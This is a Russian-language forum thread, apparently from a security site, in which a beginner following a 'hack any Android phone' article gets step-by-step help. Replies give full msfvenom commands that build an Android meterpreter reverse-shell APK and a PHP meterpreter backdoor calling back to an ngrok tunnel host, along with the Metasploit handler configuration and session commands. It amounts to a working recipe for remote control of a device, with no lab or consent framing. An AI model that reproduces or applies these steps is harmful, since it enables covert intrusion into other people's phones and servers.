Msfvenom

A

Alta1r

Добрый день, я совсем новичок и никак не могу понять, хотя долго гуглил. Решил попробовать что-то по этой статье ( Metasploit для будущих хакеров (msfvenom payload): Взломайте любой телефон на Android ), но почему-то ничего не происходит, можно обьяснить, почему?
27901
27902
27903



Мб это изза того,что я указываю LHOST, а телефон мой не входит в локальную сеть с ПК
 
поищи статья на форуме про проброс портов через ngrok. тебе порты пробросить нужно.
 
  • Нравится
Реакции: Alta1r
Скачай ngrok с официального сайта
Открой второе окно терминала в папке куда скачал архив
Введи там
Код:
unzip (имя_архива)
, после чего вводи
Код:
./ngrok help
. Увидешь там команды (к примеру для проброса tcp, тебе нужно ввести
Код:
./ngrok tcp 22
Не закрывая окно с ngrok, переходи в окно терминала msfvenom и в нём уже, указывай вместо стандартного порта тот, что указан в окне ngrok
 
  • Нравится
Реакции: Alta1r
Скачай ngrok с официального сайта
Открой второе окно терминала в папке куда скачал архив
Введи там
Код:
unzip (имя_архива)
, после чего вводи
Код:
./ngrok help
. Увидешь там команды (к примеру для проброса tcp, тебе нужно ввести
Код:
./ngrok tcp 22
Не закрывая окно с ngrok, переходи в окно терминала msfvenom и в нём уже, указывай вместо стандартного порта тот, что указан в окне ngrok
27932
27933

чет я все равно туплю
 
В твоём случае, нужно запустить тоннель http

Код:
./ngrok http 80

А в "LHOST" указать сроку "FORWARDING" (будет что-то типо этого: http://7m12abef.ngrok.io)
 
вот тебе быстрая настройка через ngrok, надеюсь разберешься что к чему:
1. Запускаем ngrok:
Код:
./ngrok tcp 4444

получаешь: tcp://0.tcp.ngrok.io:15978 -> localhost:4444



2. Настройка payload:
Код:
msfvenom -p php/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=15978 -f raw > /root/back_perdak.php

3. Настройка в MSF
Код:
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST localhost
set LPORT 4444
exploit

Запускается нагрузка - получаешь бэкконнект.
 
  • Нравится
Реакции: Vertigo
В целом всё так, только не php, а android
Alta1r, что бы ты не запутался -- резюмирую всё :)
___________________________________________________
Код:
./ngrok tcp 4444
(На самом деле порт можешь указать любой незанятый)
Получаешь tcp://0.tcp.ngrok.io:10409 -> localhost:4444

Открываешь новый терминал:

Код:
msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=10409 R > qq.apk
Полученный файл кидаешь на телефон

Далее в терминале пишем:
Код:
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST localhost
set LPORT 4444
exploit
После чего запускаешь приложение на телефоне.
Всё. Откроется сессия (если ранее не доходил до этого шага, то session 1
Дальше в этом же окне
Код:
session -i 1
Если увидел заветное слово "meterpreter" -- поздравляю, можешь писать
Код:
help
и развлекаться ;-)

P.S. В твоё последнем сообщении не работало из-за того, что ты запускал занова эксплоит после обрыва (ctrl+c). Нужно было или остановить или (даже лучше) выйти из msfconsole и зайти в неё занова
 
  • Нравится
Реакции: Alta1r
я уже разобрался,спасибо
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →

Популярный контент

🔴 Свежие CVE, 0-day и инциденты
То, о чём ChatGPT ещё не знает — обсуждаем в реальном времени
Threat Intel →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

HackerLab